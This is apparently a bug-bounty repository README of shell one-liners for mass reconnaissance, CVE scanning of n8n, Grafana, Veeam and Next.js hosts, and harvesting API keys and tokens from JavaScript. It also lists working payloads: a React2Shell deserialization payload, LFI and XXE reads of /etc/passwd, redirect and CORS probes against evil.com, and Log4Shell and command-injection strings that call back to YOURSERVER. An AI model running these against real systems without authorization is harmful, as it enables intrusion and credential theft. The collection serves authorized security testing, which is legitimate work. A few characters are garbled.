subfinder -d target.com -silent | httpx -silent | xargs -I@ -P30 sh -c 'curl -s "@/rest/settings" 2>/dev/null | grep -q "versionCli" && echo "[N8N FOUND] @"' | tee n8n_subs.txt | xargs -I@ nuclei -u @ -t http/cves/2026/CVE-2026-21858.yaml -silent
cat subdomains.txt | httpx -silent | xargs -I@ -P20 sh -c 'curl -s "@/rest/node-types" 2>/dev/null | grep -qi "git" && curl -s "@/rest/settings" 2>/dev/null | grep -qE "versionCli.*1\.(([0-9]|[0-9][0-9]|1[01][0-9]|120)\.[0-9]+)" && echo "[CVE-2026-21877 VULN] @"' | anew n8n_git_vuln.txt
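The version gate in that one-liner is worth checking in isolation: the regex alternation treats 1.0.x through 1.120.x as pre-fix releases (fixed in 1.121.x). A standalone, anchored version of the same check:

```bash
# Versions 1.0.x - 1.120.x match; 1.121.x and later do not
vuln_re='^1\.([0-9]|[0-9][0-9]|1[01][0-9]|120)\.[0-9]+$'

is_vuln() {
  if printf '%s' "$1" | grep -qE "$vuln_re"; then
    echo "vulnerable"
  else
    echo "patched"
  fi
}

is_vuln "1.120.4"
is_vuln "1.121.0"
```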
subfinder -d target.com -silent | httpx -silent -path /api/frontend/settings -match-regex '"version":"' | tee grafana_subs.txt | xargs -I@ -P15 sh -c 'curl -sI "@/login?redirect=//evil.com" 2>/dev/null | grep -qi "location.*evil" && echo "[CVE-2025-4123 VULN] @"'
subfinder -d target.com -silent | httpx -silent | nuclei -tags cve2026 -severity critical,high -c 50 -o cve2026_nuclei_results.txt
cat subdomains.txt | httpx -silent | xargs -I@ -P25 sh -c 'for path in /webhook /webhook-test /rest/workflows; do curl -s -o /dev/null -w "%{http_code}" "@$path" 2>/dev/null | grep -qE "^(200|401|403)$" && echo "[N8N ENDPOINT] @$path" && break; done' | anew n8n_webhooks.txt
subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -iE "(d-link|router|gateway|modem|dsl)" | tee router_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/dnscfg.cgi" 2>/dev/null | grep -qi "dns" && echo "[CVE-2026-0625 POTENTIAL] @"'
subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -i "veeam" | tee veeam_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/api/v1/version" 2>/dev/null | grep -qE "13\.0\.[01]\.[0-9]+" && echo "[CVE-2025-59470 VULN] @"'
subfinder -d target.com -silent | httpx -silent -json | jq -r 'select(.technologies != null) | "\(.url) \(.technologies[])"' | grep -iE "(n8n|grafana|veeam|next)" | while read url tech; do echo "[CVE-2026 CHECK] $url - $tech"; done | anew cve2026_tech_fingerprint.txt
domain="target.com"; mkdir -p recon_$domain && cd recon_$domain && subfinder -d $domain -silent | httpx -silent -title -tech-detect -json -o httpx_out.json && cat httpx_out.json | jq -r '.url' | nuclei -t ~/nuclei-templates/http/cves/2026/ -c 30 -o cve2026_vulns.txt && echo "[+] Found $(wc -l < cve2026_vulns.txt) CVE-2026 vulnerabilities!"
🎯 Pro Tip: Combine with notify to get real-time alerts: ... | notify -silent -provider slack
🎯 10 Elite Oneliners for comprehensive reconnaissance - Multi-source enumeration, ASN discovery, JS analysis & more! 🎯
subfinder -d target.com -all -silent | anew subs.txt && assetfinder --subs-only target.com | anew subs.txt && amass enum -passive -norecursive -noalts -d target.com | anew subs.txt && cat subs.txt | httpx -silent -threads 200 -tech-detect -status-code -title -o alive_with_tech.txt
Combines Subfinder + Assetfinder + Amass for maximum subdomain coverage, then validates with httpx + technology fingerprinting
echo "target.com" | dnsx -silent -resp-only -a | xargs -I{} whois -h whois.cymru.com {} | awk '{print $1}' | grep -E "AS[0-9]+" | xargs -I{} sh -c 'whois -h whois.radb.net -- "-i origin {}" | grep -Eo "([0-9.]+){4}/[0-9]+"' | mapcidr -silent | dnsx -silent -ptr -resp-only | anew asn_discovered_hosts.txt
Discovers ASN, enumerates IP blocks, performs reverse DNS to find hidden subdomains
cat alive.txt | xargs -P 50 -I{} sh -c 'echo {} | waybackurls & echo {} | gau --threads 10 --blacklist png,jpg,gif,svg,woff,ttf & echo {} | katana -d 3 -jc -kf all -silent' | uro | anew all_urls.txt
Parallel URL collection from Wayback Machine, Common Crawl, AlienVault + active crawling with smart deduplication
cat alive.txt | katana -silent -em js,json -jc -d 2 | httpx -silent -mc 200 | tee js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} | tee /tmp/js_$$.tmp | grep -oE "(api_key|apikey|api-key|secret|token|password|aws_access|AKIA[0-9A-Z]{16})" && cat /tmp/js_$$.tmp | grep -oE "/(api|v[0-9]|admin|internal)/[a-zA-Z0-9_/?=&-]+" | sort -u' | anew js_secrets_and_endpoints.txt
Finds JS files, extracts hardcoded secrets (API keys, tokens, AWS keys) and hidden API endpoints
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt_subs.txt | dnsgen - | shuffledns -d target.com -r /usr/share/wordlists/resolvers.txt -silent -o permuted_subs.txt && cat permuted_subs.txt | httpx -silent -o alive_permuted.txt
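What dnsgen does under the hood is roughly this: splice common environment words around a discovered label. A minimal sketch of the permutation step (real runs feed the output to shuffledns/puredns for mass resolution):

```bash
# Permute one discovered subdomain with common environment words
sub="api.target.com"
label=${sub%%.*}      # "api"
domain=${sub#*.}      # "target.com"

perms=$(for w in dev staging test internal; do
  echo "$label-$w.$domain"
  echo "$w-$label.$domain"
done | sort -u)
echo "$perms"
```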
CT logs enumeration + intelligent permutation (api β api-dev, api-staging) with mass DNS resolution
cat subs.txt | naabu -silent -top-ports 1000 -exclude-cdn -c 50 | sed 's/:/ /g' | awk '{print $1":"$2}' | httpx -silent -probe -status-code -title -tech-detect -follow-redirects -random-agent -o ports_with_web_services.txt
Fast port scan + discovers web apps running on unusual ports (8080, 8443, 3000, etc)
ORG="target"; for dork in "org:$ORG password" "org:$ORG api_key" "org:$ORG secret" "org:$ORG token" "org:$ORG aws_access" "org:$ORG credentials"; do echo "[+] Searching: $dork"; gh search repos "$dork" --limit 100 | grep "^$ORG" | tee -a github_secrets.txt; sleep 2; done
Automated GitHub dorking for secrets, credentials and sensitive data exposure
cat all_urls.txt | grep -oE '(s3\.amazonaws\.com/[a-zA-Z0-9._-]+|[a-zA-Z0-9._-]+\.s3\.amazonaws\.com|storage\.googleapis\.com/[a-zA-Z0-9._-]+|[a-zA-Z0-9._-]+\.blob\.core\.windows\.net)' | sort -u | tee cloud_buckets.txt | xargs -I{} sh -c 'curl -sI https://{} | grep -q "200\|403" && echo "[+] {} - Accessible"'
Extracts and validates misconfigured cloud storage buckets from collected URLs
cat all_urls.txt | uro | grep "=" | unfurl keys | sort -u | tee all_params.txt && cat all_urls.txt | gf xss | tee xss_params.txt && cat all_urls.txt | gf ssrf | tee ssrf_params.txt && cat all_urls.txt | gf sqli | tee sqli_params.txt && cat all_urls.txt | gf redirect | tee redirect_params.txt
Extracts unique parameters and categorizes by vulnerability type (XSS, SSRF, SQLi, Redirect)
DOMAIN="target.com"; DATE=$(date +%Y%m%d); mkdir -p recon_$DATE; cd recon_$DATE; subfinder -d $DOMAIN -all -silent | anew subs_$DATE.txt; cat subs_$DATE.txt | httpx -silent -threads 200 -o alive_$DATE.txt; cat alive_$DATE.txt | nuclei -t exposures/ -silent -o new_exposures_$DATE.txt; diff ../recon_$(date -d "yesterday" +%Y%m%d)/subs_*.txt subs_$DATE.txt 2>/dev/null | grep ">" | awk '{print $2}' > new_subs_$DATE.txt; [ -s new_subs_$DATE.txt ] && notify -silent -bulk < new_subs_$DATE.txt
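The new-asset detection step in isolation: `comm -13` on two sorted files prints lines unique to the second file, which is exactly what the diff in the pipeline is after (sample files stand in for yesterday's and today's subdomain lists):

```bash
# Two sorted snapshots of discovered subdomains
printf 'a.target.com\nb.target.com\n' | sort > subs_yesterday.txt
printf 'a.target.com\nb.target.com\nc.target.com\n' | sort > subs_today.txt

# Lines only in today's file = newly appeared assets
new_assets=$(comm -13 subs_yesterday.txt subs_today.txt)
echo "$new_assets"
rm -f subs_yesterday.txt subs_today.txt
```

`comm` is stricter than grepping `diff` output: both inputs must be sorted, but there is no `>`/`<` marker parsing to go wrong.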
Full persistent recon pipeline - detects new assets daily and sends notifications
🎯 Pro Tip: Run oneliner #10 via cron for 24/7 monitoring:
0 */6 * * * /path/to/recon_monitor.sh
🎯 10 Oneliners to extract endpoints, secrets and hidden APIs from JavaScript files! 🎯
cat alive.txt | katana -silent -em js -jc -d 3 | grep -E "\.js(\?|$)" | httpx -silent -mc 200 -content-length | awk '$NF > 500 {print $1}' | anew js_files.txt && mkdir -p js_downloaded && cat js_files.txt | xargs -P 30 -I{} sh -c 'curl -sk {} -o js_downloaded/$(echo {} | md5sum | cut -d" " -f1).js 2>/dev/null'
Discovers all JS files with Katana, filters by size (>500 bytes), downloads for offline analysis
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null' | grep -oE '["'"'"'](\/[a-zA-Z0-9_\-\.\/]+(\?[a-zA-Z0-9_\-\.=&]+)?)['"'"'"]' | sed 's/[\"'"'"']//g' | sort -u | grep -E "^/" | grep -vE "\.(css|png|jpg|svg|gif|woff|ico)$" | anew js_endpoints.txt
Extracts all relative API paths from JavaScript, filters static assets
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" && echo "Found in: {}"' | tee aws_keys_js.txt
Hunts for AWS Access Key IDs (AKIA, ABIA, ACCA, ASIA patterns)
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AIza[0-9A-Za-z_-]{35}|[a-z0-9-]+\.firebaseio\.com|[a-z0-9-]+\.firebaseapp\.com)" && echo "[SOURCE] {}"' | tee google_firebase_keys.txt
Extracts Google API keys and Firebase database/app URLs
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "([a-zA-Z0-9_-]+\.s3\.amazonaws\.com|s3\.amazonaws\.com\/[a-zA-Z0-9_-]+|[a-zA-Z0-9_-]+\.s3\.[a-z0-9-]+\.amazonaws\.com)" | sort -u' | anew s3_buckets_js.txt && cat s3_buckets_js.txt | xargs -I{} sh -c 'curl -sI https://{} 2>/dev/null | head -1 | grep -qE "200|403" && echo "[ACCESSIBLE] {}"'
Finds S3 buckets in JS and validates accessibility
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[01])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" && echo "[SOURCE] {}"' | sort -u | tee internal_ips_js.txt
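The same RFC 1918 regex run against an inline sample body (stand-in for the curl output), showing that public addresses are correctly ignored:

```bash
# Sample JS body with two private IPs and one public (TEST-NET) IP
js='var cfg = {api: "http://10.0.3.7/v1", cdn: "https://203.0.113.9/a", db: "192.168.1.20"};'

internal=$(printf '%s' "$js" | grep -oE '(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[01])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})')
echo "$internal"
```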
Discovers internal/private IP addresses leaked in JavaScript (10.x, 172.16-31.x, 192.168.x)
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(https://hooks\.slack\.com/services/[A-Za-z0-9/]+|[MN][A-Za-z\d]{23,}\.[\w-]{6}\.[\w-]{27})" && echo "[SOURCE] {}"' | tee slack_discord_js.txt
Extracts Slack webhook URLs and Discord bot tokens
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59}|-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)" && echo "[SOURCE] {}"' | tee github_privkeys_js.txt
Finds GitHub personal access tokens (all formats) and private key headers
⚡ 9. Email Addresses + Hidden Subdomains in JS
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u' | anew emails_js.txt && cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "https?://[a-zA-Z0-9._-]+\.target\.com[a-zA-Z0-9./?=_-]*"' | unfurl domains | sort -u | anew hidden_subdomains_js.txt
Extracts email addresses and hidden subdomains referenced in JavaScript
TARGET="target.com"; mkdir -p js_recon_$TARGET && cat alive.txt | katana -silent -em js -jc -d 3 | grep -iE "\.js(\?|$)" | httpx -silent -mc 200 | anew js_recon_$TARGET/js_urls.txt && cat js_recon_$TARGET/js_urls.txt | xargs -P 30 -I{} sh -c 'curl -sk {} 2>/dev/null | tee -a js_recon_$TARGET/all_js.txt' && grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/aws_keys.txt; grep -oE "AIza[0-9A-Za-z_-]{35}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/google_keys.txt; grep -oE "ghp_[a-zA-Z0-9]{36}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/github_tokens.txt; grep -oE '["'"'"']/[a-zA-Z0-9_/-]+["'"'"']' js_recon_$TARGET/all_js.txt | tr -d "\"'" | sort -u > js_recon_$TARGET/endpoints.txt; echo "[+] JS Recon Complete! Check js_recon_$TARGET/"
Complete JS recon pipeline: discovers JS files, downloads all, extracts AWS/Google/GitHub keys and API endpoints
🎯 Pro Tip: Use nuclei -t exposures/tokens/ on discovered secrets to validate if they're active!
🚨 Critical RCE in React Server Components & Next.js - Under active exploitation! Added to CISA KEV 🚨
cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt
curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'
cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt
# Create payload.json (safe math check - no RCE)
echo '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt
curl -X POST https://target.com -H "Next-Action: check" -F "0=@payload.json" -F "1=@trigger.txt" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"
subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt
cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'
cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt
shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt
nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt
subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt
curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500
cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt
⚠️ Affected: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | ✅ Fix: Update to React 19.0.1 / 19.1.2 / 19.2.1
🎯 Key Detection: apps accepting the `Next-Action` header + RSC deserialization = potential RCE
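Every probe one-liner above reduces to the same status-code triage: a POST carrying a `Next-Action` header that comes back 200/400/500 suggests the server action handler parsed the request, while 404/000 suggests it did not. A minimal sketch of that triage as a reusable function (the code list and the `classify_next_action` name are assumptions drawn from the one-liners above, not a definitive fingerprint):

```shell
# Classify an HTTP status code from a Next-Action POST probe.
# 200/400/500 => the framework likely processed the action header (candidate);
# anything else (404, 000, redirects) => probably not interesting.
classify_next_action() {
  case "$1" in
    200|400|500) echo "candidate" ;;
    *) echo "not-interesting" ;;
  esac
}

classify_next_action 500
classify_next_action 404
```

Drop the function into any of the xargs/parallel loops above in place of the inline `[ "$RES" != ... ]` chains when the conditions get hard to read.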
echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5
cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"
cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt
cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"
cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"
cat js.txt | xargs -I@ curl -s @ | grep -E "(__proto__|constructor\.prototype)" | anew proto_pollution.txt
cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200
cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt
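The grep above only collects candidate parameters; confirming an IDOR means comparing responses for adjacent object ids. A hypothetical helper (the `neighbors` name and the ±1 strategy are illustrative assumptions) that expands one candidate URL into neighbor-id variants for manual, authorized, GET-only comparison:

```shell
# Hypothetical sketch: given a URL whose query contains a numeric id,
# print the same URL with id-1 and id+1 for side-by-side comparison.
# Note: the pattern also matches ids embedded in names like "uid=" - fine for triage.
neighbors() {
  url="$1"
  id=$(printf '%s' "$url" | grep -oE 'id=[0-9]+' | head -1 | cut -d= -f2)
  [ -n "$id" ] || return 1
  printf '%s\n' "$url" | sed "s/id=$id/id=$((id - 1))/"
  printf '%s\n' "$url" | sed "s/id=$id/id=$((id + 1))/"
}

neighbors "https://target.example/profile?id=42"
```

Feed the output to httpx or curl under two different sessions and diff the responses; identical bodies across accounts are the actual IDOR signal.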
cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt
cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt
cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"
cat urls.txt | grep -iE "\.(xml|soap)" | qsreplace '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'
cat urls.txt | qsreplace "\`curl YOURSERVER\`" | httpx -silent
cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent
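The blind-RCE probes above only try the backtick and pipe separators; different shells and filters react to different metacharacters. A small generator (OAST_HOST is a placeholder for your own interactsh / Burp Collaborator domain, and the separator list is an illustrative sketch, not exhaustive) whose output can be fed to qsreplace one payload at a time:

```shell
# Emit blind command-injection probes for common shell separators.
# OAST_HOST is a placeholder - replace with your own callback domain.
OAST_HOST="YOURSERVER"

gen_oob_payloads() {
  printf ';curl %s\n' "$OAST_HOST"     # command separator
  printf '|curl %s\n' "$OAST_HOST"     # pipe
  printf '&&curl %s\n' "$OAST_HOST"    # conditional AND
  printf '`curl %s`\n' "$OAST_HOST"    # backtick substitution
  printf '$(curl %s)\n' "$OAST_HOST"   # $() substitution
}

gen_oob_payloads
```

Any DNS/HTTP hit on the callback host identifies which separator survived the target's filtering.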
cat alive.txt | xargs -I@ gowitness single @ -o screenshots/
cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'
cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt
cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt
cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt
cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt
cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt
cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt
cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt
cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt
curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"
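Shodan and FOFA index favicons by the mmh3 hash computed in the one-liner above, not the MD5. Once you have the hash, it plugs straight into their query syntax; a small sketch (the example hash value is purely illustrative):

```shell
# Build favicon-hash dorks from a precomputed mmh3 hash.
# The hash passed below is an example - substitute your own output.
favicon_dorks() {
  hash="$1"
  printf 'shodan: http.favicon.hash:%s\n' "$hash"
  printf 'fofa:   icon_hash="%s"\n' "$hash"
}

favicon_dorks "-1234567890"
```

Pasting the `http.favicon.hash:` dork into Shodan often surfaces origin IPs hiding behind a CDN that serve the same favicon.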
| Engine | Link | Description |
|---|---|---|
| Shodan | shodan.io | IoT & device search |
| Censys | censys.io | Internet scan data |
| Fofa | fofa.info | Cyberspace search |
| ZoomEye | zoomeye.org | Cyberspace mapping |
| Hunter | hunter.how | Asset discovery |
| Netlas | netlas.io | Attack surface |
| GreyNoise | greynoise.io | Internet scanners |
| Onyphe | onyphe.io | Cyber defense |
| CriminalIP | criminalip.io | Threat intel |
| FullHunt | fullhunt.io | Attack surface |
| Quake | quake.360.net | Cyberspace search |
| Leakix | leakix.net | Leak detection |
| URLScan | urlscan.io | URL analysis |
| DNSDumpster | dnsdumpster.com | DNS recon |
| crt.sh | crt.sh | Certificate search |
| SecurityTrails | securitytrails.com | DNS history |
| Pulsedive | pulsedive.com | Threat intel |
| VirusTotal | virustotal.com | File/URL analysis |
| PublicWWW | publicwww.com | Source code search |
| Grep.app | grep.app | GitHub code search |
| Wordlist | Link | Use Case |
|---|---|---|
| SecLists | GitHub | Everything |
| FuzzDB | GitHub | Fuzzing |
| Assetnote | wordlists.assetnote.io | Web content |
| OneListForAll | GitHub | Combined |
| jhaddix all.txt | GitHub | Directories |
| commonspeak2 | GitHub | Real-world |
- Web Application Hacker's Handbook
- Real-World Bug Hunting by Peter Yaworski
- Bug Bounty Bootcamp by Vickie Li
| Hunter | Hunter | Hunter |
|---|---|---|
| @bt0s3c | @MrCl0wnLab | @stokfredrik |
| @Jhaddix | @TomNomNom | @NahamSec |
| @zseano | @pry0cc | @pdiscoveryio |
| @jeff_foley | @haaborern | @0xacb |
We welcome contributions from the community! Your expertise makes this repository better.
Click to see contribution guidelines

1. Fork the Repository
   ```
   git clone https://github.com/KingOfBugbounty/KingOfBugBountyTips.git
   cd KingOfBugBountyTips
   ```
2. Create a New Branch
   ```
   git checkout -b feature/your-contribution
   ```
3. Add Your Content
   - Add new one-liners with proper documentation
   - Include source references and explanations
   - Follow the existing format and structure
4. Submit Pull Request
   - Write a clear description of your changes
   - Reference any related issues
   - Wait for review and feedback
- New bug bounty one-liners and techniques
- Tool installation guides and tips
- Additional resources and references
- Bug fixes and improvements
- Documentation enhancements
- Translations to other languages
If this repository helped you in your bug bounty journey, consider supporting the project!
Buy Me A Coffee

Give this repository a star if you found it helpful!
╔════════════════════════════════════════════════════════════════╗
║                      ⚠️  LEGAL NOTICE  ⚠️                       ║
╠════════════════════════════════════════════════════════════════╣
║   This repository is for EDUCATIONAL PURPOSES ONLY             ║
║                                                                ║
║   ✅ DO: Use for authorized security testing                   ║
║   ✅ DO: Learn and understand the techniques                   ║
║   ✅ DO: Contribute and share knowledge                        ║
║                                                                ║
║   ❌ DON'T: Use for unauthorized testing                       ║
║   ❌ DON'T: Use for malicious purposes                         ║
║   ❌ DON'T: Violate laws or regulations                        ║
║                                                                ║
║   The authors are NOT responsible for any misuse or damage     ║
║   caused by this information. Always test responsibly!         ║
╚════════════════════════════════════════════════════════════════╝
| Resource | Link |
|---|---|
| Homepage | King of Bug Bounty Tips |
| KingRecon DOD | Automated Recon Tool |
| BugBuntu OS | Download Here |
| YouTube Channel | OFJAAAH |
| Telegram Group | Join Community |
| Twitter/X | @ofjaaah |
| LinkedIn | Connect |
| Report Issues | GitHub Issues |
| Security Issues | Security Advisory |
To all contributors, bug bounty hunters, and the security community who make this project possible!
Last Updated: January 2026 | Version: 4.5
╔════════════════════════════════════════════════════════════════════╗
║          "Stay curious, stay ethical, stay hungry" 🏴‍☠️              ║
║                         Happy Hunting!                             ║
╚════════════════════════════════════════════════════════════════════╝
Made with β€οΈ by the Bug Bounty Community